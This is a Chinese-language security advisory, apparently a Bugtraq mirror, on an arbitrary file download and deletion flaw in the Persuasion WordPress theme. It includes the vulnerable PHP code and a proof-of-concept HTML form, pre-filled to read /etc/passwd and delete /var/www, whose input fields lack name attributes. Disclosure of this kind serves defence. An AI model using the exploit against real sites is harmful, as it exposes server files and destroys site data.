skin.php'任意文件访问漏洞

发布日期：2013-12-23
更新日期：2013-12-26

受影响系统：
mysitemyway persuasion 2.3
mysitemyway persuasion 2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 64501

Persuasion是一款强大的商业主题。

Persuasion 2.0、2.3版本没有有效过滤用户输入，攻击者可利用此漏洞下载或删除任意文件。

<*来源：Interference Security
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Exploit Title: Persuasion Wordpress Theme - Arbitrary File Download and File Deletion Exploit
Date: 19 December 2013
Exploit Author: Interference Security
Vendor Homepage:
Software Link:
Version: Tested on 2.0 and 2.3

Details:
The vulnerable file is located at
In exploit code, file name in first text box should be readable on the vulnerable server, then the vulnerable code allows it to be downloaded from the server. And the second textbox accepts a directory path. If it is writeable then vulnerable code will delete its contents.
An attacker can download readable files from the server and also can delete contents of writeable directories.

Vulnerable code:
<?php
$file = $_POST['_mysite_download_skin'];

if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);

rrmdir($_POST['_mysite_delete_skin_zip']);
    exit;
}

function rrmdir($dir) {
  if (is_dir($dir)) {
    $objects = scandir($dir);
    foreach ($objects as $object) {
      if ($object != "." && $object != "..") {
        if (filetype($dir."/".$object) == "dir") rrmdir($dir."/".$object); else unlink($dir."/".$object);
      }
    }
    reset($objects);
    rmdir($dir);
  }
}

?>

Exploit Code:
<html>
<body>
<form action="http://vulnerable-site.com/wp-content/themes/persuasion/lib/scripts/dl-skin.php" method="post">
Existing file's name:<input type="text" value="/etc/passwd"><br>
Directory to be removed:<input type="text" value="/var/www"><font color=red>Use with caution it will delete the files and directories if it is writeable</font><br>
<input type="submit">
</form>
</body>
</html>

--
Interference Security

建议：
--------------------------------------------------------------------------------
厂商补丁：

mysitemyway
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：